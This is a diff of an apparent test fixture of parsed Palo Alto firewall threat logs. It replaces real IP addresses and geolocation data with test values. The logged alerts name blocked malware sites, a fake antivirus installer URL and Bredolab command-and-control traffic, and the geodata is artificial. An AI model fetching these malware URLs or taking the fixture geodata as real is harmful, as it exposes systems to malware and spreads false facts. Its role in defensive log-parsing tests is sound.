         "network.application": "web-browsing",
-        "network.community_id": "1:rDRkkTH2aHta89i52OraqG5WcDI=",
+        "network.community_id": "1:BIi+zGCJFQAQO2X3hzjLtYZCMxg=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -3930,13 +3752,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -3960,13 +3782,6 @@
         "client.port": 58969,
         "client.user.name": "crusher",
         "destination.address": "208.73.210.29",
-        "destination.as.number": 40034,
-        "destination.as.organization.name": "Confluence Networks Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "208.73.210.29",
         "destination.port": 80,
@@ -3990,7 +3805,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 16508,
+        "log.offset": 16440,
         "network.application": "web-browsing",
         "network.community_id": "1:00fHGTkjtblnJQ9P4Wiw9QuDEpI=",
         "network.direction": "inbound",
@@ -4058,13 +3873,6 @@
         "client.port": 58941,
         "client.user.name": "crusher",
         "destination.address": "89.108.64.156",
-        "destination.as.number": 197695,
-        "destination.as.organization.name": "Domain names registrar REG.RU, Ltd",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7386,
-        "destination.geo.location.lon": 37.6068,
         "destination.geo.name": "Russian Federation",
         "destination.ip": "89.108.64.156",
         "destination.port": 80,
@@ -4088,7 +3896,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 16912,
+        "log.offset": 16844,
         "network.application": "web-browsing",
         "network.community_id": "1:sQ6YL9T0OZftMg71BK+1IHpXIRM=",
         "network.direction": "inbound",
@@ -4155,13 +3963,6 @@
         "client.port": 58942,
         "client.user.name": "crusher",
         "destination.address": "89.108.64.156",
-        "destination.as.number": 197695,
-        "destination.as.organization.name": "Domain names registrar REG.RU, Ltd",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7386,
-        "destination.geo.location.lon": 37.6068,
         "destination.geo.name": "Russian Federation",
         "destination.ip": "89.108.64.156",
         "destination.port": 80,
@@ -4185,7 +3986,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 17318,
+        "log.offset": 17250,
         "network.application": "web-browsing",
         "network.community_id": "1:a3rlKRtYt43mps+uHBznJUtG3Qg=",
         "network.direction": "inbound",
@@ -4248,7 +4049,7 @@
     },
     {
         "@timestamp": "2012-04-10T04:37:28.000-02:00",
-        "client.ip": "204.232.231.46",
+        "client.ip": "67.43.156.12",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -4264,7 +4065,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 1,
         "event.timezone": "-02:00",
@@ -4274,9 +4075,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "critical",
-        "log.offset": 17726,
+        "log.offset": 17658,
         "network.application": "web-browsing",
-        "network.community_id": "1:gfZAOGdC3xAoPZCFZCwHJJ7Iin4=",
+        "network.community_id": "1:lNN8d/0xZVYU/1cwpZQKW1N2/Kw=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -4308,7 +4109,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
@@ -4318,19 +4119,15 @@
         "server.port": 58849,
         "server.user.name": "crusher",
         "service.type": "panw",
-        "source.address": "204.232.231.46",
-        "source.as.number": 27357,
-        "source.as.organization.name": "Rackspace Hosting",
-        "source.geo.city_name": "Fort Lauderdale",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 26.1792,
-        "source.geo.location.lon": -80.1749,
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
         "source.geo.name": "United States",
-        "source.geo.region_iso_code": "US-FL",
-        "source.geo.region_name": "Florida",
-        "source.ip": "204.232.231.46",
+        "source.ip": "67.43.156.12",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -4343,17 +4140,7 @@
         "client.port": 58856,
         "client.user.name": "crusher",
         "destination.address": "216.8.179.25",
-        "destination.as.number": 13727,
-        "destination.as.organization.name": "NEXT DIMENSION INC",
-        "destination.geo.city_name": "Kitchener",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "CA",
-        "destination.geo.country_name": "Canada",
-        "destination.geo.location.lat": 43.4419,
-        "destination.geo.location.lon": -80.4216,
         "destination.geo.name": "Canada",
-        "destination.geo.region_iso_code": "CA-ON",
-        "destination.geo.region_name": "Ontario",
         "destination.ip": "216.8.179.25",
         "destination.port": 80,
         "event.action": "url_filtering",
@@ -4376,7 +4163,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 18156,
+        "log.offset": 18086,
         "network.application": "web-browsing",
         "network.community_id": "1:VeoAydUSFUdh8ZddIqbsMY32sBU=",
         "network.direction": "inbound",
@@ -4442,13 +4229,6 @@
         "client.port": 58847,
         "client.user.name": "crusher",
         "destination.address": "69.43.161.154",
-        "destination.as.number": 22489,
-        "destination.as.organization.name": "Castle Access Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "69.43.161.154",
         "destination.port": 80,
@@ -4472,7 +4252,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 18539,
+        "log.offset": 18469,
         "network.application": "web-browsing",
         "network.community_id": "1:ZsFVG8FJVifp8WmzI9Zj/lo+dB4=",
         "network.direction": "inbound",
@@ -4538,13 +4318,6 @@
         "client.port": 58841,
         "client.user.name": "crusher",
         "destination.address": "208.91.196.252",
-        "destination.as.number": 40034,
-        "destination.as.organization.name": "Confluence Networks Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "VG",
-        "destination.geo.country_name": "British Virgin Islands",
-        "destination.geo.location.lat": 18.5,
-        "destination.geo.location.lon": -64.5,
         "destination.geo.name": "Virgin Islands British",
         "destination.ip": "208.91.196.252",
         "destination.port": 80,
@@ -4568,7 +4341,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 18937,
+        "log.offset": 18867,
         "network.application": "web-browsing",
         "network.community_id": "1:NAfQ33YdKJSvbcxpFK8HIhI39lk=",
         "network.direction": "inbound",
@@ -4635,13 +4408,6 @@
         "client.port": 58795,
         "client.user.name": "crusher",
         "destination.address": "208.73.210.29",
-        "destination.as.number": 40034,
-        "destination.as.organization.name": "Confluence Networks Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "208.73.210.29",
         "destination.port": 80,
@@ -4665,7 +4431,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 19373,
+        "log.offset": 19303,
         "network.application": "web-browsing",
         "network.community_id": "1:AMcTUl91PN0z8TJr2QwdEOP+Fmo=",
         "network.direction": "inbound",
@@ -4730,19 +4496,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 58753,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -4753,7 +4515,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -4764,9 +4526,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 19768,
+        "log.offset": 19698,
         "network.application": "web-browsing",
-        "network.community_id": "1:7Tdwe73AJMSdJL4hxpQDyl5Lwn4=",
+        "network.community_id": "1:CpDZD/LwAie+2cyW3u2iJOZv/v8=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -4801,13 +4563,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -4829,19 +4591,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 58708,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -4852,7 +4610,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -4863,9 +4621,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 20162,
+        "log.offset": 20090,
         "network.application": "web-browsing",
-        "network.community_id": "1:q7ERSuCoAPSiI8xLXZCI+1M9B8I=",
+        "network.community_id": "1:9p9ImUje+ZnX1LilJHp0t55PXRA=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -4900,13 +4658,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -4929,19 +4687,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 58707,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -4952,7 +4706,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -4963,9 +4717,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 20599,
+        "log.offset": 20525,
         "network.application": "web-browsing",
-        "network.community_id": "1:AsPpOgQhhKdBtPhY4zahdBuNcTc=",
+        "network.community_id": "1:oSBh7/+acg+e1389qxJ4iY7HeRA=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5000,13 +4754,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -5029,19 +4783,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 58603,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -5052,7 +4802,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -5063,9 +4813,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 21043,
+        "log.offset": 20967,
         "network.application": "web-browsing",
-        "network.community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=",
+        "network.community_id": "1:QBN/QiBktrWtqynSIiAfIzaYi1Q=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5100,13 +4850,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -5129,19 +4879,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 58603,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -5152,7 +4898,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -5163,9 +4909,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 21451,
+        "log.offset": 21373,
         "network.application": "web-browsing",
-        "network.community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=",
+        "network.community_id": "1:QBN/QiBktrWtqynSIiAfIzaYi1Q=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5200,13 +4946,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -5226,7 +4972,7 @@
     },
     {
         "@timestamp": "2012-04-10T04:19:59.000-02:00",
-        "client.ip": "173.236.179.57",
+        "client.ip": "89.160.20.112",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -5242,7 +4988,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,89.160.20.112,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -5255,9 +5001,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "low",
-        "log.offset": 21859,
+        "log.offset": 21779,
         "network.application": "web-browsing",
-        "network.community_id": "1:to6WA2KM9vqO74DfMPJ8+v0cKPs=",
+        "network.community_id": "1:53oYZBFsaxzIKiLZtutnXPu7S8M=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5288,8 +5034,8 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "173.236.179.57",
-            "192.168.0.2"
+            "192.168.0.2",
+            "89.160.20.112"
         ],
         "related.user": [
             "crusher"
@@ -5299,19 +5045,19 @@
         "server.port": 54431,
         "server.user.name": "crusher",
         "service.type": "panw",
-        "source.address": "173.236.179.57",
-        "source.as.number": 26347,
-        "source.as.organization.name": "New Dream Network, LLC",
-        "source.geo.city_name": "Brea",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 33.9339,
-        "source.geo.location.lon": -117.8854,
+        "source.address": "89.160.20.112",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
         "source.geo.name": "United States",
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "173.236.179.57",
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -5323,19 +5069,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 58603,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -5346,7 +5088,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
